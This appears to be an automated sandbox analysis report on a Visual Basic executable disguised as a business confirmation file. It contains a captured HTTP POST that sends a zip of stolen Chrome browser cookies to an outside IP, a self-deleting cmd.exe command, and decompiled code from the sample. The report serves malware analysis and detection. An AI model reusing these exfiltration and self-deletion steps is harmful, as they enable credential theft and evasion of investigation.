4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8 b5 4e a5 3e 11 54 3f 57 4d ea 16 11 b1 29 39 42 d6 86 ce a3 f6 8e bf 00 9e ec 07 96 d8 0f 1c 6d 56 57 b4 9a 9b 8b bb ed 07 62 80 36 7b e5 11 7c 21 da 0f bc 08 ef d4 4f ec 07 12 01 4d 1a 89 8a e5 3e d6 3e c3 24 5c 2e 25 d4 d7 4c d2 88 7a 46 93 6c d0 a5 f6 03 33 9a 95 9d 01 b3 7c 08 b0 30 23 2a 4e 2b ee b7 1f 38 c4 9b e7 35 db 0f c0 ef 4e af e8 8a 55 34 2b 62 80 15 66 53 ff 03 32 3a 63 f6 8e 1f 03 7a e5 b6 04 c0 31 43 a9 1f 92 b6 da 0f 40 41 cd 9d 5a f8 26 b5 d6 a1 f6 95 77 6f 13 d5 d7 e2 16 fb 81 c3 00 52 40 04 Data Ascii: PKznN<{rinssdbm3.dll\|8NY6$J$1D a.jLVCN;}/$Z,TRqcEc=;{sp`A?MW!a?N~eAWo[},;+\Jw\|k<yR^Eonxsc=V,FcuwO[u{<w7P{K~Ewcz^[Z6GV2+n41M.w{fnJL{ dM+ /)$X!LK`MwILA8rIXr87}<]rTWmb6/_aWlB3n_joMz_Q8KgrLH.v6[4I{1g<>M$G&Y-O9\,tWmX Y3S<#}">0RBg,lh.sorp8)3Kvdsn3+]+krMu_Y\/8T&BC"u;ek u$~`{!M\WY37+nQZ3\G5dZhVLZ\|k5XFYlVVWC\|b\Zm 0PF8{]UpRW,nMMs_@>Q N>T?WM)9BmVWb6{\|!OM>>$\.%LzFl3\|0#N+85NU4+bfS2:cz1C@AZ&woR@
Mar 30, 2021 14:22:54.861716032 CEST	8144	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data, boundary=fQ2iY0qI4sL4iB1dG6aM1wQ5vV6a Content-Length: 1401 Host: 45.139.236.6
Mar 30, 2021 14:22:54.861752033 CEST	8145	OUT	Data Raw: 60 38 a0 0d 0a 2d 2d 66 51 32 69 59 30 71 49 34 73 4c 34 69 42 31 64 47 36 61 4d 31 77 51 35 76 56 36 61 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 37 79 34 57 67 33 67 Data Ascii: `8--fQ2iY0qI4sL4iB1dG6aM1wQ5vV6acontent-disposition: form-data; name="7y4Wg3gBuI_ccNKoGwkK"; filename="7y4Wg3gBuI_ccNKoGwkK.zip"Content-Type: application/octet-streamPKr~RH_*browsers/cookies/Google Chrome_Defau
Mar 30, 2021 14:22:55.761436939 CEST	8146	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Mar 2021 12:22:55 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * Data Raw: 32 38 0d 0a 36 39 65 63 32 30 33 63 38 35 34 37 30 31 32 36 37 34 33 34 34 64 61 62 62 63 39 32 37 36 39 64 61 63 39 35 30 61 61 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 2869ec203c8547012674344dabbc92769dac950aae0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Mar 30, 2021 14:22:43.042481899 CEST	111.67.28.15	443	192.168.2.4	49742	CN=ekocafebali.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Mon Feb 22 03:09:42 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Sun May 23 04:09:42 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Mar 30, 2021 14:22:43.042481899 CEST	111.67.28.15	443	192.168.2.4	49742	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19
Mar 30, 2021 14:22:46.332696915 CEST	195.201.225.248	443	192.168.2.4	49743	CN=telecut.in CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Feb 17 11:17:19 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Tue May 18 12:17:19 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
Mar 30, 2021 14:22:46.332696915 CEST	195.201.225.248	443	192.168.2.4	49743	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		ce5f3254611a8c095a3d821d44539877

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 6592 Parent PID: 5976

General

Start time:	14:21:22
Start date:	30/03/2021
Path:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe'
Imagebase:	0x400000
File size:	118784 bytes
MD5 hash:	EDEFF76475B73D1EA8F9F8EB8AFDB738
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668 Parent PID: 6592

General

Start time:	14:22:30
Start date:	30/03/2021
Path:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe'
Imagebase:	0x400000
File size:	118784 bytes
MD5 hash:	EDEFF76475B73D1EA8F9F8EB8AFDB738
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 6744 Parent PID: 5668

General

Start time:	14:22:54
Start date:	30/03/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6824 Parent PID: 6744

General

Start time:	14:22:55
Start date:	30/03/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: timeout.exe PID: 6716 Parent PID: 6744

General

Start time:	14:22:55
Start date:	30/03/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /T 10 /NOBREAK
Imagebase:	0x110000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 6592 Parent PID: 5976 CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exeCOMMON

Executed Functions

Function 0041655B, Relevance: 58.0, APIs: 27, Strings: 6, Instructions: 233
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0041655B(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, void* _a16, void* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				void* _v28;
				short _v32;
				void* _v36;
				short _v40;
				void* _v44;
				char _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				char* _v88;
				intOrPtr _v96;
				intOrPtr _v120;
				intOrPtr _v128;
				void* _v148;
				char _v152;
				void* _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				intOrPtr* _v176;
				signed int _v180;
				intOrPtr* _v184;
				signed int _v188;
				signed int _v192;
				intOrPtr* _v196;
				signed int _v200;
				signed int _t100;
				signed int _t110;
				signed int _t115;
				char* _t120;
				signed int _t123;
				char* _t128;
				signed int _t132;
				intOrPtr _t170;

				_push(0x4015e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t170;
				L004015E0();
				_v12 = _t170;
				_v8 = 0x401458;
				L00401820();
				L00401820();
				_v56 = 0x80020004;
				_v64 = 0xa;
				_t100 = 0x10;
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Stupiditeter");
				_push(L"KANAPEERNE");
				_push(L"Rekursivt"); // executed
				L004016EE(); // executed
				L00401814();
				_push(0xb4);
				_push(0);
				L00401772();
				asm("sbb eax, eax");
				_v156 =  ~( ~( ~_t100));
				L0040182C();
				if(_v156 != 0) {
					_v56 = _a4;
					_v64 = 9;
					_v88 = L"komplikationens";
					_v96 = 8;
					if( *0x41b010 != 0) {
						_v176 = 0x41b010;
					} else {
						_push("p"w");
						_push(0x40f3cc);
						L0040185C();
						_v176 = 0x41b010;
					}
					_t128 =  &_v48;
					L00401862();
					_v156 = _t128;
					_t132 =  *((intOrPtr*)( *_v156 + 0x60))(_v156,  &_v152, _t128,  *((intOrPtr*)( *((intOrPtr*)( *_v176)) + 0x32c))( *_v176));
					asm("fclex");
					_v160 = _t132;
					if(_v160 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x40ea9c);
						_push(_v156);
						_push(_v160);
						L00401856();
						_v180 = _t132;
					}
					_v120 = _v152;
					_v128 = 3;
					_push(0x10);
					L004015E0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004015E0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004015E0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(3);
					_push(L"xz647");
					_push(_v24);
					L00401784();
					L00401850();
				}
				if( *0x41b2d4 != 0) {
					_v184 = 0x41b2d4;
				} else {
					_push(0x41b2d4);
					_push(0x40ed14);
					L0040185C();
					_v184 = 0x41b2d4;
				}
				_v156 =  *_v184;
				_t110 =  *((intOrPtr*)( *_v156 + 0x14))(_v156,  &_v48);
				asm("fclex");
				_v160 = _t110;
				if(_v160 >= 0) {
					_v188 = _v188 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40ed04);
					_push(_v156);
					_push(_v160);
					L00401856();
					_v188 = _t110;
				}
				_v164 = _v48;
				_t115 =  *((intOrPtr*)( *_v164 + 0x140))(_v164,  &_v148);
				asm("fclex");
				_v168 = _t115;
				if(_v168 >= 0) {
					_v192 = _v192 & 0x00000000;
				} else {
					_push(0x140);
					_push(0x40ed24);
					_push(_v164);
					_push(_v168);
					L00401856();
					_v192 = _t115;
				}
				_v40 = _v148;
				L00401850();
				if( *0x41b010 != 0) {
					_v196 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v196 = 0x41b010;
				}
				_t120 =  &_v48;
				L00401862();
				_v156 = _t120;
				_t123 =  *((intOrPtr*)( *_v156 + 0xc4))(_v156, _t120,  *((intOrPtr*)( *((intOrPtr*)( *_v196)) + 0x340))( *_v196));
				asm("fclex");
				_v160 = _t123;
				if(_v160 >= 0) {
					_v200 = _v200 & 0x00000000;
				} else {
					_push(0xc4);
					_push(0x40eb90);
					_push(_v156);
					_push(_v160);
					L00401856();
					_v200 = _t123;
				}
				L00401850();
				_v32 = 0x34c8;
				_push(0x41690a);
				L00401850();
				L0040182C();
				L0040182C();
				return _t123;
			}

0x00416560
0x0041656b
0x0041656c
0x00416578
0x00416580
0x00416583
0x00416590
0x0041659b
0x004165a0
0x004165a7
0x004165b0
0x004165b1
0x004165bb
0x004165bc
0x004165bd
0x004165be
0x004165bf
0x004165c4
0x004165c9
0x004165ce
0x004165d8
0x004165dd
0x004165de
0x004165e0
0x004165e7
0x004165ed
0x004165f7
0x00416605
0x0041660e
0x00416611
0x00416618
0x0041661f
0x0041662d
0x0041664a
0x0041662f
0x0041662f
0x00416634
0x00416639
0x0041663e
0x0041663e
0x0041666e
0x00416672
0x00416677
0x00416692
0x00416695
0x00416697
0x004166a4
0x004166c6
0x004166a6
0x004166a6
0x004166a8
0x004166ad
0x004166b3
0x004166b9
0x004166be
0x004166be
0x004166d3
0x004166d6
0x004166dd
0x004166e0
0x004166ea
0x004166eb
0x004166ec
0x004166ed
0x004166ee
0x004166f1
0x004166fb
0x004166fc
0x004166fd
0x004166fe
0x004166ff
0x00416702
0x0041670c
0x0041670d
0x0041670e
0x0041670f
0x00416710
0x00416712
0x00416717
0x0041671a
0x00416725
0x00416725
0x00416731
0x0041674e
0x00416733
0x00416733
0x00416738
0x0041673d
0x00416742
0x00416742
0x00416760
0x00416778
0x0041677b
0x0041677d
0x0041678a
0x004167ac
0x0041678c
0x0041678c
0x0041678e
0x00416793
0x00416799
0x0041679f
0x004167a4
0x004167a4
0x004167b6
0x004167d1
0x004167d7
0x004167d9
0x004167e6
0x0041680b
0x004167e8
0x004167e8
0x004167ed
0x004167f2
0x004167f8
0x004167fe
0x00416803
0x00416803
0x00416819
0x00416820
0x0041682c
0x00416849
0x0041682e
0x0041682e
0x00416833
0x00416838
0x0041683d
0x0041683d
0x0041686d
0x00416871
0x00416876
0x0041688a
0x00416890
0x00416892
0x0041689f
0x004168c4
0x004168a1
0x004168a1
0x004168a6
0x004168ab
0x004168b1
0x004168b7
0x004168bc
0x004168bc
0x004168ce
0x004168d3
0x004168d9
0x004168f4
0x004168fc
0x00416904
0x00416909

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 00416578
__vbaStrCopy.MSVBVM60(?,?,?,?,004015E6), ref: 00416590
__vbaStrCopy.MSVBVM60(?,?,?,?,004015E6), ref: 0041659B
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 004165B1
#689.MSVBVM60(Rekursivt,KANAPEERNE,Stupiditeter,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 004165CE
__vbaStrMove.MSVBVM60(Rekursivt,KANAPEERNE,Stupiditeter,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 004165D8
__vbaStrCmp.MSVBVM60(00000000,00000000,Rekursivt,KANAPEERNE,Stupiditeter), ref: 004165E0
__vbaFreeStr.MSVBVM60(00000000,00000000,Rekursivt,KANAPEERNE,Stupiditeter), ref: 004165F7
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,00000000,00000000,Rekursivt,KANAPEERNE,Stupiditeter), ref: 00416639
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416672
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA9C,00000060), ref: 004166B9
__vbaChkstk.MSVBVM60(00000000,?,0040EA9C,00000060), ref: 004166E0
__vbaChkstk.MSVBVM60(00000000,?,0040EA9C,00000060), ref: 004166F1
__vbaChkstk.MSVBVM60(00000000,?,0040EA9C,00000060), ref: 00416702
__vbaLateMemCall.MSVBVM60(?,xz647,00000003), ref: 0041671A
__vbaFreeObj.MSVBVM60 ref: 00416725
__vbaNew2.MSVBVM60(0040ED14,0041B2D4,00000000,00000000,Rekursivt,KANAPEERNE,Stupiditeter), ref: 0041673D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040ED04,00000014), ref: 0041679F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040ED24,00000140), ref: 004167FE
__vbaFreeObj.MSVBVM60(00000000,?,0040ED24,00000140), ref: 00416820
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00416838
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416871
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EB90,000000C4), ref: 004168B7
__vbaFreeObj.MSVBVM60(00000000,?,0040EB90,000000C4), ref: 004168CE
__vbaFreeObj.MSVBVM60(0041690A), ref: 004168F4
__vbaFreeStr.MSVBVM60(0041690A), ref: 004168FC
__vbaFreeStr.MSVBVM60(0041690A), ref: 00416904

Strings

Rekursivt, xrefs: 004165C9
KANAPEERNE, xrefs: 004165C4
komplikationens, xrefs: 00416618
p"w, xrefs: 00416626, 0041662F, 0041663E, 0041664A, 00416825, 0041682E, 0041683D, 00416849
xz647, xrefs: 00416712
Stupiditeter, xrefs: 004165BF

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Chkstk$CheckHresult$New2$Copy$#689CallLateMove
String ID: KANAPEERNE$Rekursivt$Stupiditeter$komplikationens$p"w$xz647
API String ID: 1993890283-541708909
Opcode ID: c9d351b2b922f32a25cc64fc5fbda0e95d202772fe1f51ffa5928250d8890221
Instruction ID: d2b23b192056a1e2eef90ac311bc67c836bada7e02ec2dab7bec72182e7b514f
Opcode Fuzzy Hash: c9d351b2b922f32a25cc64fc5fbda0e95d202772fe1f51ffa5928250d8890221
Instruction Fuzzy Hash: FEA11971E00218DFDB20EF61CC45BDDB7B5EF09304F1084AAE519BB2A1DB799A848F59

Uniqueness

Uniqueness Score: -1.00%

Function 00414A36, Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 252
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00414A36(void* __ebx, void* __ecx, void* __edi, void* __esi, signed long long __fp0, intOrPtr* _a4, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				intOrPtr _v44;
				char _v52;
				signed int _v60;
				char _v68;
				intOrPtr _v76;
				char _v84;
				intOrPtr _v92;
				char _v100;
				char _v116;
				char* _v124;
				intOrPtr _v132;
				char* _v140;
				char _v148;
				char _v184;
				signed int _v188;
				signed char _v192;
				signed int _v196;
				signed int _v204;
				intOrPtr* _v208;
				signed char _v212;
				signed long long _v220;
				signed long long _v224;
				signed int _v228;
				signed int _v232;
				intOrPtr* _v236;
				signed int _v240;
				char* _t126;
				signed int _t138;
				signed int _t145;
				signed int _t148;
				signed int _t153;
				signed int _t157;
				signed char _t161;
				signed int _t165;
				intOrPtr _t178;
				intOrPtr _t190;
				intOrPtr* _t191;
				signed long long _t194;
				signed long long _t196;

				_t194 = __fp0;
				_push(0x4015e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t190;
				L004015E0();
				_v12 = _t190;
				_v8 = 0x401358;
				L00401820();
				_v92 = 5;
				_v100 = 2;
				_v76 = 0x63;
				_v84 = 2;
				_t9 =  &_v60;
				 *_t9 = _v60 & 0x00000000;
				_v68 = 2;
				_v44 = 0x64;
				_v52 = 2;
				_push( &_v100);
				_push( &_v84);
				_push( &_v68);
				_push( &_v52);
				_push( &_v116);
				L0040179C();
				_push( &_v116);
				_t126 =  &_v32;
				_push(_t126);
				L004017A2();
				_push(_t126);
				L004017A8();
				L004017C6();
				asm("fcomp qword [0x401350]");
				asm("fnstsw ax");
				asm("sahf");
				if( *_t9 == 0) {
					_v204 = _v204 & 0x00000000;
				} else {
					_v204 = 1;
				}
				_v188 =  ~_v204;
				L0040182C();
				_push( &_v116);
				_push( &_v100);
				_push( &_v84);
				_push( &_v68);
				_push( &_v52);
				_push(5);
				L004017BA();
				_t191 = _t190 + 0x18;
				if(_v188 != 0) {
					if( *0x41b010 != 0) {
						_v208 = 0x41b010;
					} else {
						_push("p"w");
						_push(0x40f3cc);
						L0040185C();
						_v208 = 0x41b010;
					}
					_t178 =  *((intOrPtr*)( *_v208));
					_t157 =  &_v36;
					L00401862();
					_v188 = _t157;
					_t161 =  *((intOrPtr*)( *_v188 + 0x60))(_v188,  &_v184, _t157,  *((intOrPtr*)(_t178 + 0x330))( *_v208));
					asm("fclex");
					_v192 = _t161;
					if(_v192 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x40ea9c);
						_push(_v188);
						_push(_v192);
						L00401856();
						_v212 = _t161;
					}
					asm("fild dword [ebp-0xb4]");
					_v220 = _t194;
					_t196 = _v220 *  *0x401348;
					asm("fnstsw ax");
					if((_t161 & 0x0000000d) != 0) {
						return __imp____vbaFPException();
					}
					_v224 = _t196;
					 *_t191 = _v224;
					_t165 =  *((intOrPtr*)( *_a4 + 0x84))(_a4, _t178);
					asm("fclex");
					_v196 = _t165;
					if(_v196 >= 0) {
						_v228 = _v228 & 0x00000000;
					} else {
						_push(0x84);
						_push(0x40e734);
						_push(_a4);
						_push(_v196);
						L00401856();
						_v228 = _t165;
					}
					L00401850();
				}
				_v124 = L"3/3/3";
				_v132 = 8;
				L004017AE();
				_push( &_v52);
				_push( &_v68); // executed
				L00401790(); // executed
				_v140 = 3;
				_v148 = 0x8002;
				_push( &_v68);
				_t138 =  &_v148;
				_push(_t138);
				L00401796();
				_v188 = _t138;
				_push( &_v68);
				_push( &_v52);
				_push(2);
				L004017BA();
				if(_v188 != 0) {
					_v140 = 0x80020004;
					_v148 = 0xa;
					_v124 = 0x80020004;
					_v132 = 0xa;
					L004015E0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004015E0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t153 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10);
					asm("fclex");
					_v188 = _t153;
					if(_v188 >= 0) {
						_v232 = _v232 & 0x00000000;
					} else {
						_push(0x2b0);
						_push(0x40e734);
						_push(_a4);
						_push(_v188);
						L00401856();
						_v232 = _t153;
					}
				}
				if( *0x41b010 != 0) {
					_v236 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v236 = 0x41b010;
				}
				_t145 =  &_v36;
				L00401862();
				_v188 = _t145;
				_t148 =  *((intOrPtr*)( *_v188 + 0xc4))(_v188, _t145,  *((intOrPtr*)( *((intOrPtr*)( *_v236)) + 0x340))( *_v236));
				asm("fclex");
				_v192 = _t148;
				if(_v192 >= 0) {
					_v240 = _v240 & 0x00000000;
				} else {
					_push(0xc4);
					_push(0x40eb90);
					_push(_v188);
					_push(_v192);
					L00401856();
					_v240 = _t148;
				}
				L00401850();
				_v28 = 0x1a2ac1;
				asm("wait");
				_push(0x414e53);
				L0040182C();
				return _t148;
			}

0x00414a36
0x00414a3b
0x00414a46
0x00414a47
0x00414a53
0x00414a5b
0x00414a5e
0x00414a6b
0x00414a70
0x00414a77
0x00414a7e
0x00414a85
0x00414a8c
0x00414a8c
0x00414a90
0x00414a97
0x00414a9e
0x00414aa8
0x00414aac
0x00414ab0
0x00414ab4
0x00414ab8
0x00414ab9
0x00414ac1
0x00414ac2
0x00414ac5
0x00414ac6
0x00414acb
0x00414acc
0x00414ad1
0x00414ad6
0x00414adc
0x00414ade
0x00414adf
0x00414aed
0x00414ae1
0x00414ae1
0x00414ae1
0x00414afc
0x00414b06
0x00414b0e
0x00414b12
0x00414b16
0x00414b1a
0x00414b1e
0x00414b1f
0x00414b21
0x00414b26
0x00414b32
0x00414b3f
0x00414b5c
0x00414b41
0x00414b41
0x00414b46
0x00414b4b
0x00414b50
0x00414b50
0x00414b76
0x00414b80
0x00414b84
0x00414b89
0x00414ba4
0x00414ba7
0x00414ba9
0x00414bb6
0x00414bd8
0x00414bb8
0x00414bb8
0x00414bba
0x00414bbf
0x00414bc5
0x00414bcb
0x00414bd0
0x00414bd0
0x00414bdf
0x00414be5
0x00414bf1
0x00414bf7
0x00414bfb
0x004015ec
0x004015ec
0x00414c01
0x00414c0e
0x00414c19
0x00414c1f
0x00414c21
0x00414c2e
0x00414c50
0x00414c30
0x00414c30
0x00414c35
0x00414c3a
0x00414c3d
0x00414c43
0x00414c48
0x00414c48
0x00414c5a
0x00414c5a
0x00414c5f
0x00414c66
0x00414c73
0x00414c7b
0x00414c7f
0x00414c80
0x00414c85
0x00414c8f
0x00414c9c
0x00414c9d
0x00414ca3
0x00414ca4
0x00414ca9
0x00414cb3
0x00414cb7
0x00414cb8
0x00414cba
0x00414ccb
0x00414cd1
0x00414cdb
0x00414ce5
0x00414cec
0x00414cf6
0x00414d03
0x00414d04
0x00414d05
0x00414d06
0x00414d0a
0x00414d14
0x00414d15
0x00414d16
0x00414d17
0x00414d20
0x00414d26
0x00414d28
0x00414d35
0x00414d57
0x00414d37
0x00414d37
0x00414d3c
0x00414d41
0x00414d44
0x00414d4a
0x00414d4f
0x00414d4f
0x00414d35
0x00414d65
0x00414d82
0x00414d67
0x00414d67
0x00414d6c
0x00414d71
0x00414d76
0x00414d76
0x00414da6
0x00414daa
0x00414daf
0x00414dc3
0x00414dc9
0x00414dcb
0x00414dd8
0x00414dfd
0x00414dda
0x00414dda
0x00414ddf
0x00414de4
0x00414dea
0x00414df0
0x00414df5
0x00414df5
0x00414e07
0x00414e0c
0x00414e13
0x00414e14
0x00414e4d
0x00414e52

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 00414A53
__vbaStrCopy.MSVBVM60(?,?,?,?,004015E6), ref: 00414A6B
#664.MSVBVM60(?,00000002,00000002,00000002,00000002), ref: 00414AB9
__vbaStrVarVal.MSVBVM60(?,?,?,00000002,00000002,00000002,00000002), ref: 00414AC6
#581.MSVBVM60(00000000,?,?,?,00000002,00000002,00000002,00000002), ref: 00414ACC
__vbaFpR8.MSVBVM60(00000000,?,?,?,00000002,00000002,00000002,00000002), ref: 00414AD1
__vbaFreeStr.MSVBVM60 ref: 00414B06
